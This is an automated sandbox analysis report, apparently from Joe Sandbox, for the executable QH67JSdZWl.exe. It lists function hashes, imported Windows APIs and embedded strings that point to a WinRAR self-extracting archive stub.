                                                                                    • Instruction ID: 6f1a9dcad999ccc4f5fe3f49f89794fbb215664919db302f8aad5be884f8f3e7
                                                                                    • Opcode Fuzzy Hash: 820732c4663d1a1f89e8b30917ba5da5edfb3a61d737e51b2e4aaca6b582d31a
                                                                                    • Instruction Fuzzy Hash: 9CB04820E16A028AEA482B19A882694A2A4AB69B12FD80039C20C40324DE2C21A65724
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 012b2bdf26780dd33329a607de65fe5bd7b7b30844d5888e2e9f7c854c3a6c63
                                                                                    • Instruction ID: c78512d2460d99071418a8af99f2a413209db565ec4a4ae7ce9eb87f8042ab9b
                                                                                    • Opcode Fuzzy Hash: 012b2bdf26780dd33329a607de65fe5bd7b7b30844d5888e2e9f7c854c3a6c63
                                                                                    • Instruction Fuzzy Hash: 7482E173A096C18AD704FF2CD4546BCFBA1E766B89F898136CB4A17789CE3C9446C324
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1b81ad90bc00ffa7305f4426a1aeb893548c14e9161fb9f56d6066a182c418c0
                                                                                    • Instruction ID: a396444528cef26b5d5b83ff6a6754171ce12eeace12b67c857a7cd5b425876a
                                                                                    • Opcode Fuzzy Hash: 1b81ad90bc00ffa7305f4426a1aeb893548c14e9161fb9f56d6066a182c418c0
                                                                                    • Instruction Fuzzy Hash: E1821473A092C18AD714EF28D4447BCFBA1F7A6B49F588136CB4A47789DA3CE446C724
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b58e6ab87df6c28b5f54a5634b1c82765b43c8f801b906eb30613143f4409b29
                                                                                    • Instruction ID: c52da0ad57efe79e13e9372ad681ae4ffe0b812326851ff33a6a4117865f4b39
                                                                                    • Opcode Fuzzy Hash: b58e6ab87df6c28b5f54a5634b1c82765b43c8f801b906eb30613143f4409b29
                                                                                    • Instruction Fuzzy Hash: B662819AD7AF9A1EE313E53A54020E2F36D0EFB4C5596D31BFCA430D16AB61A6C30314
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9b98fe4a8efe445cc86ba1dd7fe521c523f09f261c174a8aacf3a031856f4ae3
                                                                                    • Instruction ID: b5b1d6afea187435839415ce9fdc77cfdab379c5fb4b26e77b3e529bdf0a356b
                                                                                    • Opcode Fuzzy Hash: 9b98fe4a8efe445cc86ba1dd7fe521c523f09f261c174a8aacf3a031856f4ae3
                                                                                    • Instruction Fuzzy Hash: 3D5248B3B246548BD365CF19E889E5F77A9F788784B46D318DB0A8BB05D63CD901CB40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 907186660deeaaed22d8738c2b505fe1078276317d5b8168ef4c387c308dde43
                                                                                    • Instruction ID: 6899e9c84c0cc826b32e07d97e87c90b9cf2b8ea626a07052f01ffa1f84dd5b2
                                                                                    • Opcode Fuzzy Hash: 907186660deeaaed22d8738c2b505fe1078276317d5b8168ef4c387c308dde43
                                                                                    • Instruction Fuzzy Hash: F932D472E041818BD718EF28D5507BCB7A1F7A5749F448239DB4A87B88DB3CE861C754
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 86fe45f9a751129283f2acea0d21b177845440ea197c46f58f83ea7cdb3c87bc
                                                                                    • Instruction ID: a39637ff8d8d9c5449b19208f150dd2fe384ce8ef8e1a6efda73c58c7e8c15c4
                                                                                    • Opcode Fuzzy Hash: 86fe45f9a751129283f2acea0d21b177845440ea197c46f58f83ea7cdb3c87bc
                                                                                    • Instruction Fuzzy Hash: FFE16A73B141A18FE324CFBD9840A9D3BA1F39878CB45A125DF59A3F09D678D511CB84
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3a5b02fa3201378ad8d9614ec6c04a71f1c51e9db5558cf6ef68ebc6d0063b00
                                                                                    • Instruction ID: dda4fb6b89904e05db8b64b5e0973a29bfca440cc69cdca22bfa1cedd8062903
                                                                                    • Opcode Fuzzy Hash: 3a5b02fa3201378ad8d9614ec6c04a71f1c51e9db5558cf6ef68ebc6d0063b00
                                                                                    • Instruction Fuzzy Hash: D7A12273A081834EEB15FA6C84447BDE691EBB2749F954135DB890778ADE3CE843C368
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: AddressProc
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                    • String ID: DXGIDebug.dll$UNC$\$\$\\?\
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Global$AllocCreateStream
                                                                                    • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                    • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                    Similarity
                                                                                    • API ID: Window$MessageObjectSend$ClassDeleteLongName
                                                                                    • String ID: STATIC
                                                                                    Similarity
                                                                                    • API ID: ItemTextWindow
                                                                                    • String ID: LICENSEDLG
                                                                                    • API String ID: 2478532303-2177901306
                                                                                    • Opcode ID: 41696ad9de8f4e89a394de1e36f8b759beada25f57ed009437ff3c9fa10f2114
                                                                                    • Instruction ID: 89f5610731bd377db649f6eec96abdaf1c980179d1af6cf66959aeb1ac9f1e64
                                                                                    • Opcode Fuzzy Hash: 41696ad9de8f4e89a394de1e36f8b759beada25f57ed009437ff3c9fa10f2114
                                                                                    • Instruction Fuzzy Hash: 8B418331A087428AFB54BB19E4447B8E361BF66B82F940135DF0D07B99CF3DA6478328
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                    • API String ID: 2915667086-2207617598
                                                                                    • Opcode ID: 1a2a0462fba0bbc2057d87a603739d697dd4cc3eff5894cc4bad96471bd1a8f1
                                                                                    • Instruction ID: fea7ce9ffdbb1b1f4ac0a244e2de548efcd3767622ed87337f4be703a45b0aef
                                                                                    • Opcode Fuzzy Hash: 1a2a0462fba0bbc2057d87a603739d697dd4cc3eff5894cc4bad96471bd1a8f1
                                                                                    • Instruction Fuzzy Hash: 62315834A18B439DFA10BF1AA840575E361AF67B92FD40131CA6D077ACDE3CE1578328
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: File$NamedPipe$CreateErrorLastPeekReadWaitWrite
                                                                                    • String ID: \\.\pipe\
                                                                                    • API String ID: 687869086-91387939
                                                                                    • Opcode ID: 775a8035613ed1d19014cf5cf142c3491cf5c4671f54193dbf5003945902ee6f
                                                                                    • Instruction ID: 8c36ca2c81592090c9b27ffa39497ae2bcc7bc1b5d5814787444c8735b65316e
                                                                                    • Opcode Fuzzy Hash: 775a8035613ed1d19014cf5cf142c3491cf5c4671f54193dbf5003945902ee6f
                                                                                    • Instruction Fuzzy Hash: 73418372618A42C6F720EB25E4503AAE3A0FB95758FD04135EB4D4799CCF7CD546CB14
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                                    • String ID: csm$csm$csm
                                                                                    • API String ID: 2940173790-393685449
                                                                                    • Opcode ID: 42093b04772e557fd7bd192b609e06aa5878fa6e40c44ccf295585569dcfa627
                                                                                    • Instruction ID: 6122b7cf1eabe58ea17579eec1993dfd363a90c563a38e42d1b444c668530413
                                                                                    • Opcode Fuzzy Hash: 42093b04772e557fd7bd192b609e06aa5878fa6e40c44ccf295585569dcfa627
                                                                                    • Instruction Fuzzy Hash: 5FE1A372E087828EE710AF68D4403ADF7A0FB66759F510235EB9C5765ACF78E082C714
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: AllocClearStringVariant
                                                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                                                                    • API String ID: 1959693985-3505469590
                                                                                    • Opcode ID: 5ec0bdf6e4fd55f7a855f6cb4b4b547710adc0b70fdccd3bae3911fccdb829d4
                                                                                    • Instruction ID: 081c597371c22695947e221763785cb0aaf58b31bd376a5e89ddcfbba18a4df8
                                                                                    • Opcode Fuzzy Hash: 5ec0bdf6e4fd55f7a855f6cb4b4b547710adc0b70fdccd3bae3911fccdb829d4
                                                                                    • Instruction Fuzzy Hash: D5713A36A14A058AEB10AF69E8805ADF7B0FBA9B99F805132DF5D43B68CF3CD045C714
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7B8F26403,?,?,?,00007FF7B8F240CE,?,?,?,00007FF7B8F24089), ref: 00007FF7B8F26281
                                                                                    • GetLastError.KERNEL32(?,?,00000000,00007FF7B8F26403,?,?,?,00007FF7B8F240CE,?,?,?,00007FF7B8F24089), ref: 00007FF7B8F2628F
                                                                                    • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF7B8F26403,?,?,?,00007FF7B8F240CE,?,?,?,00007FF7B8F24089), ref: 00007FF7B8F262B9
                                                                                    • FreeLibrary.KERNEL32(?,?,00000000,00007FF7B8F26403,?,?,?,00007FF7B8F240CE,?,?,?,00007FF7B8F24089), ref: 00007FF7B8F26327
                                                                                    • GetProcAddress.KERNEL32(?,?,00000000,00007FF7B8F26403,?,?,?,00007FF7B8F240CE,?,?,?,00007FF7B8F24089), ref: 00007FF7B8F26333
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                    • String ID: api-ms-
                                                                                    • API String ID: 2559590344-2084034818
                                                                                    • Opcode ID: f98d511d16b7c984806b59baf49c4c0eb2992fa5f93f3c16c0f276863a04ae74
                                                                                    • Instruction ID: df948d777a858e048c81fe4d7b3ffce8832d23fc68f7bd8e66a4286cf0dde502
                                                                                    • Opcode Fuzzy Hash: f98d511d16b7c984806b59baf49c4c0eb2992fa5f93f3c16c0f276863a04ae74
                                                                                    • Instruction Fuzzy Hash: 2631A131A1A64189EE11AF8AD800575E394FF66BA1F994535EF1D077C8DF3CE8468338
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(?,?,?,00007FF7B8F20F18,?,?,?,00007FF7B8F2135D), ref: 00007FF7B8F20FD3
                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF7B8F20F18,?,?,?,00007FF7B8F2135D), ref: 00007FF7B8F20FF0
                                                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF7B8F20F18,?,?,?,00007FF7B8F2135D), ref: 00007FF7B8F2100C
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: AddressProc$HandleModule
                                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                    • API String ID: 667068680-1718035505
                                                                                    • Opcode ID: 5a6a0a82813450954e4bce8bd94bd8ae44adaf32ce5c5423b070ca480ec48ac8
                                                                                    • Instruction ID: 1f57dab19f0a97241e100bcf4f8a78635e02c8a39fd65bbc70e2b1c85f20d94b
                                                                                    • Opcode Fuzzy Hash: 5a6a0a82813450954e4bce8bd94bd8ae44adaf32ce5c5423b070ca480ec48ac8
                                                                                    • Instruction Fuzzy Hash: 90115231A1EB424DFE51BF09E540179D291AF66792FC80434DB1E06358EE7CB5C7822C
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID: .rar$exe$rar$sfx
                                                                                    • API String ID: 3668304517-630704357
                                                                                    • Opcode ID: ed6c0415aae53d5d83c44bf31e967b4a1997e99d836b0e2f6e20eacd756ede83
                                                                                    • Instruction ID: c7d6c8630c45e9f5169f3778244be5053d56a9a1cd6cb17e956297127a05484c
                                                                                    • Opcode Fuzzy Hash: ed6c0415aae53d5d83c44bf31e967b4a1997e99d836b0e2f6e20eacd756ede83
                                                                                    • Instruction Fuzzy Hash: CCA1B332E1874648EA00BFA9D4402BCE361AF62B95F945231DF2D1769DDF7CE486C358
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: abort$CallEncodePointerTranslator
                                                                                    • String ID: MOC$RCC
                                                                                    • API String ID: 2889003569-2084237596
                                                                                    • Opcode ID: 0d0f266487a6bcdd9fb4d9508dd7b9d72bd76ff777f79cb43f1981ed916f6d56
                                                                                    • Instruction ID: 42d680102784fc8451fe3cc52c9f1347f04b341aee49a91750157ce91ec6e1bb
                                                                                    • Opcode Fuzzy Hash: 0d0f266487a6bcdd9fb4d9508dd7b9d72bd76ff777f79cb43f1981ed916f6d56
                                                                                    • Instruction Fuzzy Hash: 1D91C173A087918AE710EF68D4402ACFBA0FB66789F904229EF4C47759DF78D196C714
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
                                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                    • API String ID: 2102711378-639343689
                                                                                    • Opcode ID: fbbc364b443e6bcbfe149e379a3e4d438152505baa5786c220f9f4379ee1b85d
                                                                                    • Instruction ID: b701ff1f4c72b9185781814feca63206d3804317477a822c69b944da7dce4330
                                                                                    • Opcode Fuzzy Hash: fbbc364b443e6bcbfe149e379a3e4d438152505baa5786c220f9f4379ee1b85d
                                                                                    • Instruction Fuzzy Hash: 1A51B262E1865289FB00EB69D8416BDE361AF66794FD01231DF1C5269EDF3CE582C328
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: Window$Show$Rect
                                                                                    • String ID: RarHtmlClassName
                                                                                    • API String ID: 2396740005-1658105358
                                                                                    • Opcode ID: 6fa0cc47f7d0707d55d9f83579601ab4afff23b49e7df68c938394172d119a7c
                                                                                    • Instruction ID: 596ab5b137192e54df9a4c723bb70cecf81ab811a5cbe9cfaa6078b4c783f84d
                                                                                    • Opcode Fuzzy Hash: 6fa0cc47f7d0707d55d9f83579601ab4afff23b49e7df68c938394172d119a7c
                                                                                    • Instruction Fuzzy Hash: 76517431A087428EEB24AB29E44437AE761FFA6B81F840135DB4E47B5DDF3CE0468714
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                    • API String ID: 0-56093855
                                                                                    Similarity
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                    • API String ID: 4061214504-1276376045
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                    • String ID:
                                                                                    • API String ID: 3215553584-0
                                                                                    Similarity
                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 3659116390-0
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$AllocString
                                                                                    • String ID:
                                                                                    • API String ID: 262959230-0
                                                                                    Similarity
                                                                                    • API ID: AddressProc
                                                                                    • String ID:
                                                                                    • API String ID: 190572456-0
                                                                                    Similarity
                                                                                    • API ID: _set_statfp
                                                                                    • String ID:
                                                                                    • API String ID: 1156100317-0
                                                                                    Similarity
                                                                                    • API ID: __except_validate_context_recordabort
                                                                                    • String ID: csm$csm
                                                                                    • API String ID: 746414643-3733052814
                                                                                    Similarity
                                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                    • String ID: csm
                                                                                    • API String ID: 2395640692-1018135373
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                    • String ID: $*
                                                                                    • API String ID: 3215553584-3982473090
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$StringType
                                                                                    • String ID: $%s
                                                                                    • API String ID: 3586891840-3791308623
                                                                                    Similarity
                                                                                    • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                                                    • String ID: csm
                                                                                    • API String ID: 2466640111-1018135373
                                                                                    Similarity
                                                                                    • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                    • String ID: U
                                                                                    • API String ID: 2456169464-4171548499
                                                                                    Similarity
                                                                                    • API ID: ObjectRelease
                                                                                    • String ID:
                                                                                    • API String ID: 1429681911-3916222277
                                                                                    Similarity
                                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                    • String ID: Thread pool initialization failed.
                                                                                    • API String ID: 3340455307-2182114853
                                                                                    Similarity
                                                                                    • API ID: CapsDeviceRelease
                                                                                    • String ID:
                                                                                    • API String ID: 127614599-3916222277
                                                                                    Similarity
                                                                                    • API ID: ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1452528299-0
                                                                                    Similarity
                                                                                    • API ID: FileMove_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3823481717-0
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 4141327611-0
                                                                                    APIs
                                                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7B8F2B37B), ref: 00007FF7B8F2FAB1
                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7B8F2B37B), ref: 00007FF7B8F2FB13
                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7B8F2B37B), ref: 00007FF7B8F2FB4D
                                                                                    • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7B8F2B37B), ref: 00007FF7B8F2FB77
                                                                                    Similarity
                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                    • String ID:
                                                                                    • API String ID: 1557788787-0
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLast$ConnectNamedObjectOverlappedPipeReadResultSingleWaitWrite
                                                                                    • String ID:
                                                                                    • API String ID: 1643396940-0
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$abort
                                                                                    • String ID:
                                                                                    • API String ID: 1447195878-0
                                                                                    Similarity
                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                    • String ID:
                                                                                    • API String ID: 2933794660-0
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID: DXGIDebug.dll
                                                                                    • API String ID: 3668304517-540382549
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                    • String ID: e+000$gfff
                                                                                    • API String ID: 3215553584-3030954782
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                                                    • String ID: SIZE
                                                                                    • API String ID: 449872665-3243624926
                                                                                    Similarity
                                                                                    • API ID: ItemTextWindow
                                                                                    • String ID: ASKNEXTVOL
                                                                                    • API String ID: 2478532303-3402441367
                                                                                    Similarity
                                                                                    • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                    • String ID: C:\Users\user\Desktop\QH67JSdZWl.exe
                                                                                    • API String ID: 3307058713-847691198
                                                                                    Similarity
                                                                                    • API ID: ItemTextWindow
                                                                                    • String ID: RENAMEDLG
                                                                                    • API String ID: 2478532303-3299779563
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide_snwprintf
                                                                                    • String ID: $%s$@%s
                                                                                    • API String ID: 2650857296-834177443
                                                                                    Similarity
                                                                                    • API ID: DialogParamVisibleWindow
                                                                                    • String ID: GETPASSWORD1
                                                                                    • API String ID: 3157717868-3292211884
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryFreeLocal
                                                                                    • String ID: D
                                                                                    • API String ID: 2937684288-2746444292
                                                                                    Similarity
                                                                                    • API ID: FileHandleType
                                                                                    • String ID: @
                                                                                    • API String ID: 3000768030-2766056989
                                                                                    APIs
                                                                                    • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7B8F21792), ref: 00007FF7B8F23070
                                                                                    • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7B8F21792), ref: 00007FF7B8F230B1
                                                                                    Similarity
                                                                                    • API ID: ExceptionFileHeaderRaise
                                                                                    • String ID: csm
                                                                                    • API String ID: 2573137834-1018135373
                                                                                    • Opcode ID: 68f3dbc6005816547e4d83ef393b177f67aef7054119f2fe87beddd7780f2646
                                                                                    • Instruction ID: 3a1d150d4506cc6ecf1d75213a4cc43b752733f2351c69119f37c6ecf6884407
                                                                                    • Opcode Fuzzy Hash: 68f3dbc6005816547e4d83ef393b177f67aef7054119f2fe87beddd7780f2646
                                                                                    • Instruction Fuzzy Hash: D2115E72618B4082EB20DF19E400269F7E1FB99B99F584234EF8C07B68DF3CC5528B14
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B8F0E2C7,?,?,?,00007FF7B8F0398E,?,?,?), ref: 00007FF7B8F0E3CB
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7B8F0E2C7,?,?,?,00007FF7B8F0398E,?,?,?), ref: 00007FF7B8F0E3D6
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: ErrorLastObjectSingleWait
                                                                                    • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                    • API String ID: 1211598281-2248577382
                                                                                    • Opcode ID: ca613bb110bc7e2d7e73c1113578bb410ad9a3da1ca73437c45ebd2c42cb4644
                                                                                    • Instruction ID: ee98217762d618408a1f41159df489b068e29972ad4999bc049578acfd4ea041
                                                                                    • Opcode Fuzzy Hash: ca613bb110bc7e2d7e73c1113578bb410ad9a3da1ca73437c45ebd2c42cb4644
                                                                                    • Instruction Fuzzy Hash: 2DE04F75E188024AF600BB2DEC859B4E211AFB3336FD00331D23E455ED9F2CA5078329
                                                                                    APIs
                                                                                    Strings
                                                                                    Similarity
                                                                                    • API ID: FindHandleModuleResource
                                                                                    • String ID: RTL
                                                                                    • API String ID: 3537982541-834975271
                                                                                    • Opcode ID: 27688530daeaabcc01455478abd0328a1a7ecef62b4615ede859eb8aa962639a
                                                                                    • Instruction ID: dea75731a5f899118028f9228865d31895808dc2f253fb36e3c3acdca83e74bc
                                                                                    • Opcode Fuzzy Hash: 27688530daeaabcc01455478abd0328a1a7ecef62b4615ede859eb8aa962639a
                                                                                    • Instruction Fuzzy Hash: DDD01261F3564546FF196B799448235D3515B2AB42F880438CA0905368EE6C9185C724

                                                                                    Execution Graph

